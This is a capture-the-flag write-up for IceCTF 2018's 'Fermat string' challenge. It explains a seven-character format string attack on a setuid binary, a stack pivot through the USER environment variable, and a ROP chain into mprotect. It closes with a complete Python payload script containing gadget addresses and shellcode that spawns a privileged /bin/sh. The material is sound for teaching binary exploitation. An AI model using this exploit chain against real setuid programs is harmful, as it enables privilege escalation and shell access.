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14 September 2018

IceCTF 2018 - Fermat string Writeup

by madt1m

Does size matter?

The challenge description gives us some hint about Format Strings attacks, and the ability to exploit their phenomenal powers…in a Itty-Bitty living space :) […a margin of paper]

Some Analysis

Which kind of beast are we facing? A run of checksec and file:

AltText AltText

With PIE disabled, and the binary statically linked, we basically have every address we desire carved in a stone. Running multiple times the binary in target machine, with gdb set disable-randomization off, also confirms that stack addresses are stable during different runs.

This time, we do have the source code to analyze. Let’s take a look.

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

void welcome(void)
	char *user = getenv("USER");
	char buf[1000 + (user != NULL ? strlen(user) : 0)];
	memset (buf, 0, sizeof(buf));
	snprintf (buf, sizeof(buf), "Welcome to Fermat's Last Exploit, %s!", user);
	printf ("%s", buf); /* Careful */

void payload(char *input) {
    char buf[16];
    int i, cnt = -1;


    /* Make sure input isn't too long */
    if (strlen (input) > 7)
    	fprintf (stderr, "Your payload is too large!\n");

    /* Ensure there aren't any rogue format string conversions in here */
    for (i = 0; i < strlen(input); i++)
    	if (input[i] == '%')
    if (cnt > 0)
    	fprintf (stderr, "No `%%' characters allowed!\n");

    memset (buf, 0, sizeof(buf));
    /* Avoid security problems by checking length, just in case */
    strncpy (buf, input, sizeof(buf)-1);
    printf (buf);

void dispatch(int argc, char **argv)
    if (argc > 1){
        payload (argv[1]);
    } else {
        printf("Usage: %s <payload>\n", argv[0]);

int main(int argc, char **argv) {
    dispatch (argc, argv);

    return 0;

We can provide two kinds of inputs:

About input

int i, cnt = -1;
/* Ensure there aren't any rogue format string conversions in here */
    for (i = 0; i < strlen(input); i++)
        if (input[i] == '%')
    if (cnt > 0)
        fprintf (stderr, "No `%%' characters allowed!\n");

It is clear that the protection mechanism will be triggered with at least two uses of ‘%’ character. So we have only one format specifier to shoot.

/* Make sure input isn't too long */
    if (strlen (input) > 7)
        fprintf (stderr, "Your payload is too large!\n");

Here it is, our tiny margin of space. Length of the string cannot seemingly exceed 7 characters.

memset (buf, 0, sizeof(buf));
/* Avoid security problems by checking length, just in case */
strncpy (buf, input, sizeof(buf)-1);
printf (buf);

At last, a format string vulnerability!

About USER

char buf[1000 + (user != NULL ? strlen(user) : 0)];
snprintf (buf, sizeof(buf), "Welcome to Fermat's Last Exploit, %s!", user);

The buffer grows together with the length of our env input. This means we can stretch it quite a lot :)

Planning The Attack

NX enabled, PIE disabled, binary is statically linked. We have a way to write over memory (format strings) and a way to fill the stack with arbitrary input (USER env variable copied in buf). We have static address for pretty much everything.

I have a clear goal in mind:

  1. Place in USER a payload composed of:
    • A ROPchain calling mprotect() to enable RWX permissions on a stack page;
    • A shellcode to setreuid(1337, 1337) & execve("/bin/sh", NULL, NULL)
  2. Exploit the format string vulnerability to jump to my previously placed payload.


The reason I need setreuid(1337, 1337) lays in how Linux and bash handle permissions. fermat binary is owned by target user, with setuid bit enabled. This means that every user running the binary will run it with owner permissions, which we need to read the flag.

However, in our target machine, /bin/sh links to /bin/bash, and for security reasons the latter drops suid privileges when executed.

The solution to this is to call setreuid(), which sets our real_id to be equal to our current effective_id. Linux manual is there for more informations on the argument :)

So, back to the business…I need a reliable way to start my ROPchain.

In technical words, this means that ESP register must point to the beginning of the fake stack I have injected via USER variable, and EIP register must point to a ret instruction.

To keep things short, I’ll explain here how I managed to obtain the above, together with the exploit. For your information, getting to that solution required a lot of trial and error, and searching thru the stack and text section with GDB.

The Exploit

Let’s see how to use our format string vulnerability. This is a snapshot of memory layout when hitting the vulnerable printf():


Looking at output from bt and stack we can examine the how stack frames where formed. We are in function payload(), and there on the stack we have:

We will use a stack pivoting technique to make ESP point to our fake stack.

The idea is to overwrite Saved EBP in dispatch frame, at address 0xffffd5a8, to point to our payload injected in welcome().

How? We have 7 characters.

The following input: %14$hn writes 0 in the two bytes starting at the address pointed by the 14th word after the format string.

In practice:

Now, remember the welcome() function? Thanks to that function, we can write a huge payload into memory, and buffer will grow (in stack, so towards lower addresses), so that we can make the area now written in Saved BP (0xffff0000) pointing to our payload.

Now I needed to find a way to write that value into ESP and trigger the ROPChain.

The trick to trigger stack pivoting is using the two leave instruction in dispatch and main:

I slightly modified this approach because of these instructions in main:


Following leave, the value in memory pointed by ecx - 4 is moved into esp. Luckily, we can control the content of ecx, since it is loaded in: mov ecx, DWORD PTR [ebp - 0x4], and ebp is already pointing to our fake stack.

The rest of the work has just been writing a ROPchain which didn’t contain NULL bytes (that couldn’t reside in env) – but since the binary is statically linked, I have a whole load of ROP gadgets already linked to binary, found with ropper – and carefully computing addresses inside and outside gdb. Here, the script to generate the payload, which I used in target machine with:

USER=$(python ./fermat "%14\$hn"

import struct

def p32(address):
  return struct.pack("I", address)

# To compute addresses to store args to mprotect
mprotect_base = 0xffff105c
# mprotect requires a page aligned boundary
stackpage_base = 0xffff1000
# setreuid(geteuid(), geteuid()) && execve("/bin//sh", NULL, NULL)
shellcode = "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46"
shellcode += "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68"
shellcode += "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"

movdpedx = 0x08055a2b # mov dword ptr [edx], eax; ret
xoreax = 0x08049743 # xor eax, eax; ret
inceax = 0x0807f1bf # inc eax; ret
popedx = 0x08073bda # pop edx; ret
popeax = 0x080bd026 # pop eax; ret
mprotect = 0x8072c50 # address to mprotect

# The ropchain computes args to mprotect and pushes them
# to the right address in fake stack, which is after mprotect_base.
# mprotect_base is a value I have computed by trial, looking
# at where, after payload injection, mprotect address was loaded
# into fake stack.

ropchain = p32(popedx) + p32(mprotect_base + 4) + p32(popeax)
ropchain += p32(stackpage_base - 1) + p32(inceax) + p32(movdpedx)
ropchain += p32(popedx) + p32(mprotect_base + 8) + p32(xoreax)
ropchain += p32(inceax) + p32(movdpedx) + p32(popedx) + p32(mprotect_base + 12)
ropchain += p32(xoreax) + p32(inceax)*7 + p32(movdpedx) + p32(mprotect)
# mprotect_base + 16 points to the shellcode; we need to ret to it.
# BBBB*3 will be overwritten at runtime by movdpedx gadgets.
ropchain += p32(mprotect_base + 16) + "BBBB"*3

payload = "A"*6394  # Distance between 0xffff0000 - 0x4 and start of USER
payload += p32(0xffff1004) # address to load into esp + 0x4
payload += 'A'*4096 # JUNK
payload += ropchain
payload += shellcode
payload += 'A'*(30000 - len(payload)) # just because I used 30k to compute addresses and experiment.


tags: pwn  binary-exploitation  writeup  icectf